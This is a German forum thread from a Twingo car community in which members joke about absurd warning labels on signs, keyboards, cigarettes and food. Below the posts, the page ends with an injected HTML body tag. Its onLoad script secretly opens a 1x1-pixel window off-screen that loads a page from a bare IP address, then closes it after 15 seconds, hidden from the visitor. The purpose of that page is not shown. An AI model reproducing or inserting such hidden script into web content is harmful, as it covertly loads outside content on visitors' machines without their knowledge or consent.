Das Twingoforum...

Normale Version: ... das macht Sinn...
Du siehst gerade eine vereinfachte Darstellung unserer Inhalte. Normale Ansicht mit richtiger Formatierung.
[Bild: halteverbot.jpg]

... ok, muss dazu sagen, dass ich es bei Hochwasser Fotografiert habe Laughing
Naja,

im schönen Deutschland wo es Normen dafür gibt, wie man Blätter locht ist das eigentlich nicht verwunderlich auch mal sowas in Zukunft zu sehen Wink

Aber ich bin ja dann doch schon froh das wir keine amerikanischen Verhältnisse haben: wir sind zar pingelig, aber die Firmen da drüben müssen ja generell von der Blödheit der Kunden ausgehen. Wenn da auf nem Kaffeebecher bei ner Fastfoodkette nicht drauf steht, das der HEISS ist kommen direkt die Millionenklagen. Wäre mir peinlich in so einem Land zu leben...

Aber was hat das mit dem Thema zu tun? Smile
Chris - TFNRW schrieb:Naja,

Aber ich bin ja dann doch schon froh das wir keine amerikanischen Verhältnisse haben: wir sind zar pingelig, aber die Firmen da drüben müssen ja generell von der Blödheit der Kunden ausgehen.

Aber was hat das mit dem Thema zu tun? Smile

kann ich nur zustimmen, hab mir heut "zwangsweise" ne neue Tastatur gekauft und, steht über den Pfeiltasten drüber gedruckt
Zitat:Warnung:
Einige Experten sind der Meinung, daß die Verwendung von Tastaturen Gesundheitsschäden hervorrufen kann.
[..]

Rolling Eyes Rolling Eyes

Die Welt wird immer bekloppter. Shocked

Aber zurück zum Thema: rofl, spitzen Pic!Laughing

gruß
AHA...

du hast also auch ne Logitech - Tastatur??? Cool

Steht bei mir nämlich auch drauf! Und auf dem Boden steht dann ne knappe DIN A5 - Seite, was da alles passieren kann... Twisted Evil

CU
Karsten H. -TFNRW-
Man sollte auf die Dinger noch ne extra Warnung für Frauen draufsetzen, das man sich ja nen Fingernagel abbrechen könnte...

Sorry, aber ich finds arm Sad Genauso wie auf den Kippen: "Rauchen gefährdet die Gesundheit" - ACH??

"Schokolade macht dick" und all sowas, darauf wart ich noch. Smile
Chris - TFNRW schrieb:..."Schokolade macht dick"...

Nicht nur Schokolade... Also zumindest bei Frauen Mr. Green

Also werden demnächst auch noch andere Sachen bedruckt, ja? Shocked
da gibbet sowas wie ein tatoo Very Happy
Tatoo? AUA! *wegrenn*

Ben


<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);"></body>